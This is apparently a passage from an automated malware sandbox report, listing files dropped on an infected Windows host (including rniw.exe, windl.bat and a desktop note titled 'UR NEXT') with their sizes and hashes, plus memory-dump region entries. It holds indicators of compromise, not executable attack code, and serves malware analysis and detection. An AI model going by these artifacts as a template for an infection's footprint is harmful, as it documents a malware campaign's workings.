SHA51209c5fb0c30e10985bedf2507633d1891481e69840b6bbd348fda006fd51838cfb85054eadedb543efa1fb124814fb86f875f6a2c617ed3d90fd9891c820aff39
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
2KB
MD59a8ff6481b8a5408cc19896008752be8
SHA1468ef66938de4400a7c941ef5bc500bd9ca6743d
SHA256dc3c31739f312dbeaf3bf5481575fe53a4292a94ddeff2ff253b06c4b402439c
SHA51287135af9d0301efca5a6b0569568e2ca19e9161ee3ed92fceef5c4a89532196a0f86ff50b1d40ce88f0249416efa6e535a6fc260776bdd0f17a7adf558d6a822
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe56e321.TMPFilesize
1KB
MD5525005c578ee98a8947093dec24a02e8
SHA1ebecb014176acf8809a4ecf63029ba503d24ce3f
SHA256aa6c88f4226c669c4d2e98bf569a983ff96bd73e4070dae14fae5570fd21b129
SHA512617806426d9b74cc94c07c2199d9b4648fd98e74a8f5a1b28a63b5936fe8d7c877efe998f053d59949183a14242a458a92b012fdb86140917a3b62c5a9e86d54
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD500e9a8496a2258e8066d0853bcd049d1
SHA1c3448dcaeefa2eec87984b1a1780eb1641af7bbf
SHA256e5eaa72512f5eb3eeca9596fc9f94f0e02e929909a1b48da6d6b817af70e3ac9
SHA5122bdc906fd05ca086b69df74959d205f9697c9801bfb9d9aabcc9a8dea14c2b3524af990d7ce0a210202abe2fbd12ebdca7a52e64ce79924ec1b3272c14dfc5ab
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
9KB
MD50e4fb31da14764119bac3e38796390a0
SHA1d3651bc98bc76318a7e03ea753746afc597223fe
SHA25624cd8e8849ea861e0e5265446142412d0f056b6d59e8210cfba4705653039b8e
SHA512f81498b3d511b9c0bef9ea3488879fcb861ca3bfd5e930719f20b9395b84c32967d45a38e98f477dc37a0de11bada8f8f117453c116cc28a28e929a393db0535
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD5716b6e247bf9f48c42100c4b0a49e52a
SHA1c7bacaf2c0d665ef1e4fd5a57e7b9d58db2eb774
SHA256109a64f33a7acc5b1d2252b84d3dd1a6af1f4f0e5aa3d314dc6c36ccc682ea5a
SHA5125058393eafbdc0e4df410d56d618383655a3618e4e4d7307e18b2cfa33e12136a613ded1d760b767f0004aeb2eb5b2e74d967f9c898359c7e70531b998777491
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD59e7764382df23bba262a5ce38d4cffe6
SHA13647428f9a38dc9f5a1bce0adbb59013c63e1256
SHA256a11ec500b766cd3776023231321861b0b6bf4ac6cfecb78928bf0e4ddfb132a4
SHA5120299a7f07d1a73709e94ee6d61e61ea9f8d4168819d854bce4fe3e3c2745a7f01d1f795320ab43adb13d8691adad63c6ad58cb7f768ec1326fbeb263f804aa41
-
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdbFilesize
512KB
MD5b5bf7ab5419ad1a9d1809da39a2ded64
SHA177046550e36f7131c2e20892398485bb8a2f6d27
SHA256e4c6199af0e1e5c5d8771005e989889a97c1b12484c239df6f1a408e5eb4b7d7
SHA51287ffc84a0507491ad0d2db2f5bc904b95284d72e56465afbfdc562704f28198279a72cd127508fb8313b9be037da1d6cb8893e9fccf19cb6c1c99b6b804d8f73
-
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XMLFilesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD57274a07d1b80de6f66290b47588cee3b
SHA1d926b384806c755fe6b9d03f68852765aabb5703
SHA2565eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8
SHA512b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5c5c54b380f57c913542f55379c708de3
SHA139206bf0c181ef47892f9010def99dfc9f1aa7fa
SHA2560695c0068388857408df49e99e3e7e071fe4bbc4b69b9b5d732e10e32ae6a24c
SHA5120a34dc4226c1fff243cdaca0b5d3be7f3916756985277a8a0baadb6c7ba3bd7db5becc73569a43278ffc67bb2dcd0e032d761de95fdceb379e0d2b12b90b1308
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1k30wbdg.sjf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\one.rtfFilesize
403B
MD56fbd6ce25307749d6e0a66ebbc0264e7
SHA1faee71e2eac4c03b96aabecde91336a6510fff60
SHA256e152b106733d9263d3cf175f0b6197880d70acb753f8bde8035a3e4865b31690
SHA51235a0d6d91178ec10619cf4d2fd44d3e57aa0266e1779e15b1eef6e9c359c77c384e0ffe4edb2cde980a6847e53f47733e6eacb72d46762066b3541dee3d29064
-
C:\Users\Admin\AppData\Local\Temp\rniw.exeFilesize
76KB
MD59232120b6ff11d48a90069b25aa30abc
SHA197bb45f4076083fca037eee15d001fd284e53e47
SHA25670faa0e1498461731f873d3594f20cbf2beaa6f123a06b66f9df59a9cdf862be
SHA512b06688a9fc0b853d2895f11e812c48d5871f2793183fda5e9638ded22fc5dc1e813f174baedc980a1f0b6a7b0a65cd61f29bb16acc6dd45da62988eb012d6877
-
C:\Users\Admin\AppData\Local\Temp\text.txtFilesize
396B
MD59037ebf0a18a1c17537832bc73739109
SHA11d951dedfa4c172a1aa1aae096cfb576c1fb1d60
SHA25638c889b5d7bdcb79bbcb55554c520a9ce74b5bfc29c19d1e4cb1419176c99f48
SHA5124fb5c06089524c6dcd48b6d165cedb488e9efe2d27613289ef8834dbb6c010632d2bd5e3ac75f83b1d8024477ebdf05b9e0809602bbe1780528947c36e4de32f
-
C:\Users\Admin\AppData\Local\Temp\v.mp4Filesize
81KB
MD5d2774b188ab5dde3e2df5033a676a0b4
SHA16e8f668cba211f1c3303e4947676f2fc9e4a1bcc
SHA25695374cf300097872a546d89306374e7cf2676f7a8b4c70274245d2dccfc79443
SHA5123047a831ed9c8690b00763061807e98e15e9534ebc9499e3e5abb938199f9716c0e24a83a13291a8fd5b91a6598aeeef377d6793f6461fc0247ec4bbd901a131
-
C:\Users\Admin\AppData\Local\Temp\windl.batFilesize
771B
MD5a9401e260d9856d1134692759d636e92
SHA14141d3c60173741e14f36dfe41588bb2716d2867
SHA256b551fba71dfd526d4916ae277d8686d83fff36d22fcf6f18457924a070b30ef7
SHA5125cbe38cdab0283b87d9a9875f7ba6fa4e8a7673d933ca05deddddbcf6cf793bd1bf34ac0add798b4ed59ab483e49f433ce4012f571a658bc0add28dd987a57b6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-msFilesize
3KB
MD583c335004ce15808eef6471578943703
SHA1ced3ab5911e2d9feef10d3abd1ee616c5d2ae895
SHA256abe42f261269cc9a5ed06799747dcbdcd3d06fed697e4cf8c26faa628e42a1c1
SHA5128a577c8a5d50fa1397e274aaea43279d6ee033dc975147351b073901f1f92d13215608031627c8fef7b6b4d58cbe9c36147c4d10ba443e84bbec39dcdb32546c
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkFilesize
2KB
MD56f379175c2c6f11480c061cbd889f0c7
SHA1a5e8ea9d83f2d0174aa879091f091eb4f980881e
SHA256db6f5e1d2f4c1f29004eddf5d3ead369d3f27fc8c747273da64608a1f3e18295
SHA512b127aa9b7b7906f89d0439bd85a6b05ab9fe59380fece4560d4c4d0a3bcf5caf793d18580f6b90bb9a4517a9a5e248c8f7af1de8a7aa9e162339b5dcfeb66e6f
-
C:\Users\Admin\Desktop\UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR NEXT UR N1XT.txtFilesize
396B
MD59037ebf0a18a1c17537832bc73739109
SHA11d951dedfa4c172a1aa1aae096cfb576c1fb1d60
SHA25638c889b5d7bdcb79bbcb55554c520a9ce74b5bfc29c19d1e4cb1419176c99f48
SHA5124fb5c06089524c6dcd48b6d165cedb488e9efe2d27613289ef8834dbb6c010632d2bd5e3ac75f83b1d8024477ebdf05b9e0809602bbe1780528947c36e4de32f
-
C:\Users\Admin\Downloads\000.zipFilesize
119KB
MD5f5d73448dbe1ec4f9a8ec187f216d9e5
SHA16f76561bd09833c75ae8f0035dcb2bc87709e2e5
SHA256d66c4c08833f9e8af486af44f879a0a5fb3113110874cc04bd53ee6351c92064
SHA512edbdc1d3df9094c4e7c962f479bb06cdc23555641eeb816b17a8a5d3f4d98f4d1d10299fd2f9152d30e3fa9e5b12c881fd524e75612e934b287109492ee1520b
-
\??\pipe\LOCAL\crashpad_1916_MSHANWBPXSDHYELJMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/1004-799-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/1004-802-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/1004-1632-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/1004-1633-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/1004-810-0x000000000BA20000-0x000000000BA30000-memory.dmpFilesize
64KB
-
memory/1004-809-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/1004-774-0x0000000000620000-0x0000000000CCE000-memory.dmpFilesize
6.7MB
-
memory/1004-775-0x0000000005CF0000-0x0000000006294000-memory.dmpFilesize
5.6MB
-
memory/1004-808-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/1004-783-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/1004-807-0x000000000BA20000-0x000000000BA30000-memory.dmpFilesize
64KB
-
memory/1004-794-0x00000000056C0000-0x00000000056D0000-memory.dmpFilesize
64KB
-
memory/1004-795-0x0000000008A00000-0x0000000008A38000-memory.dmpFilesize
224KB
-
memory/1004-796-0x00000000089C0000-0x00000000089CE000-memory.dmpFilesize
56KB
-
memory/1004-806-0x000000000BA20000-0x000000000BA30000-memory.dmpFilesize
64KB
-
memory/1004-800-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/1004-801-0x0000000008A60000-0x0000000008A70000-memory.dmpFilesize
64KB
-
memory/2984-147-0x0000026972B80000-0x0000026972B90000-memory.dmpFilesize
64KB
-
memory/2984-143-0x0000026972B80000-0x0000026972B90000-memory.dmpFilesize
64KB
-
memory/2984-133-0x0000026975D00000-0x0000026975D22000-memory.dmpFilesize
136KB
-
memory/2984-144-0x0000026972B80000-0x0000026972B90000-memory.dmpFilesize
64KB
-
memory/5760-457-0x0000000004610000-0x0000000004620000-memory.dmpFilesize
64KB
-
memory/5760-472-0x0000000005B50000-0x0000000005B6E000-memory.dmpFilesize
120KB
-
memory/5760-473-0x0000000007390000-0x0000000007A0A000-memory.dmpFilesize
6.5MB
-
memory/5760-458-0x0000000004610000-0x0000000004620000-memory.dmpFilesize
64KB
-
memory/5760-456-0x0000000004C50000-0x0000000005278000-memory.dmpFilesize
6.2MB
-
memory/5760-455-0x0000000004580000-0x00000000045B6000-memory.dmpFilesize
216KB
-
memory/5760-461-0x00000000054E0000-0x0000000005546000-memory.dmpFilesize
408KB
-
memory/5760-474-0x0000000006050000-0x000000000606A000-memory.dmpFilesize
104KB
-
memory/5760-460-0x0000000005470000-0x00000000054D6000-memory.dmpFilesize
408KB
-
memory/5760-459-0x0000000004B90000-0x0000000004BB2000-memory.dmpFilesize
136KB
-
memory/6068-489-0x0000000004B30000-0x0000000004B40000-memory.dmpFilesize
64KB
-
memory/6068-488-0x0000000004B30000-0x0000000004B40000-memory.dmpFilesize
64KB